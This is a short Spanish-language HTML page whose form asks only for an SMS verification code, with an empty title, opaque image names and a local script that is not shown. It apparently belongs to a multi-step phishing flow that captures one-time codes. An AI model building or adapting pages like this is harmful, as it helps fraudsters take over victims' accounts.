<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/obeta.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    
        <div>
            <div class="upot2">
                <img src="./img/topaupcc.png" alt="">
            </div>
        </div>
    
        <div>
            <div class="dota2">
                <div class="up">
                    <img src="./img/otmmupo.svg" alt="">
                </div>
                <form class="formcc" method="post" id="pg3">
                   
                    <p>CÓDIGO SMS</p>
                    <input type="tel" placeholder="" name="" id="sps1" required maxlength="10"> 
        
                    <button type="submit">VALIDAR</button>
                    
                </form>
    
            
            </div>
        </div>
    
       
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>